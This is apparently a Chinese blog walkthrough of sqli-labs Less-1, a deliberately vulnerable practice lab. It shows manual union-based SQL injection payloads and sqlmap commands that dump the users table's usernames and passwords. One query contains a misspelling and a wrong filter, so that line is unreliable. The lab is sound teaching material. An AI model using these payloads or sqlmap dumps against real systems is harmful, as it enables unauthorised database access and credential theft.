sqlilabs通关-----page1.1
方法 1 手工注入
1.1 打开http://127.0.0.1/sqlilabs/Less-1/
http://127.0.0.1/sqlilabs/Less-1/;
1.2 可以看到屏幕要求输入一个数值id,于是输入?id=1尝试(id=2,3等均可尝试)
http://127.0.0.1/sqlilabs/Less-1/?id=1;
1.3 虽然提示输入数值,但是需要确认是数值型还是字符型利用试错方式:and 1=1以及and 1=2 发现结果均未显示错误:出现这种情况需要考虑是否id处传值为id=’’,输入‘ and 1=1–+或者是’ and 1=1%23
(这里产生了疑问,即为什么注释#无法成功?通过抓包发现末位#根本不会被http传递,同理为什么–(空格)会报错)
详情参考:https://blog.csdn.net/xiayun1995/article/details/86500605)
http://127.0.0.1/sqlilabs/Less-1/?id=1’and 1=1#;
可以判断出为字符型注入;开始试错,通过order by 进行测试有多少列,可以发现在第4列报错,故数据库中只有三列数据
找到了列数,开始进行报错测试
(id=’‘这里报错即可,无需在意id具体等于什么,即也可以是id=-1’ union select 1,2,3%23)
出现了2,3列显错,代表可以从2,3列进行查询
?id=-1'union select 1,2,3%23
分别查询database();version();发现5.76版本以及数据库名称security,在mysql高于5.0版本中内置系统表information_schema,进一步查询security中的表格:
?id=-1 union select 1,group_concat(table_name),3 from information_scehma.tables where table_name='security'%23
(group_concat的功能:
将group by产生的同一个分组中的值连接起来,返回一个字符串结果。即可以查询一张表同名数据,并且同名数据的不同值依然可以展现)
找到我们感兴趣的users表,搜索users表中的内容:
?id=-1 'union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users"%23
出现了最为重要的username和password:
?id=-1 ' union select 1,group_concat(username),group_concat(password) from users%23
这就得到了整个users表中的全部用户名及对应的密码
方法 2 sqlmap注入
2.1 首先对sqlmap进行升级
sqlmap --update
如果提示无法升级,按照提示使用git clone升级
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap
2.2 如果是虚拟机上sqlmap访问本机搭建的sqlilbas,需要关闭防火墙,并使用本机ip进行访问
https://blog.csdn.net/x111mj222/article/details/108665001
2.3 使用sqlmap直接尝试获取数据库的所有表
sqlmap -u http://11.0.4.242/sqlilabs/Less-1/?id=1 --tables
2.4 找到当前所在的数据库(security)
sqlmap -u http://11.0.4.242/sqlilabs/Less-1/?id=1 --current-db
2.5 查找security下的表users
sqlmap -u http://11.0.4.242/sqlilabs/Less-1/?id=1 --tables -D security
2.6 查找users中的列
sqlmap -u http://11.0.4.242/sqlilabs/Less-1/?id=1 --columns -D security
-T users
2.7 查找users中的username以及password
sqlmap -u http://11.0.4.242/sqlilabs/Less-1/?id=1 --dump -D security
-T users -C username,password
2147
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
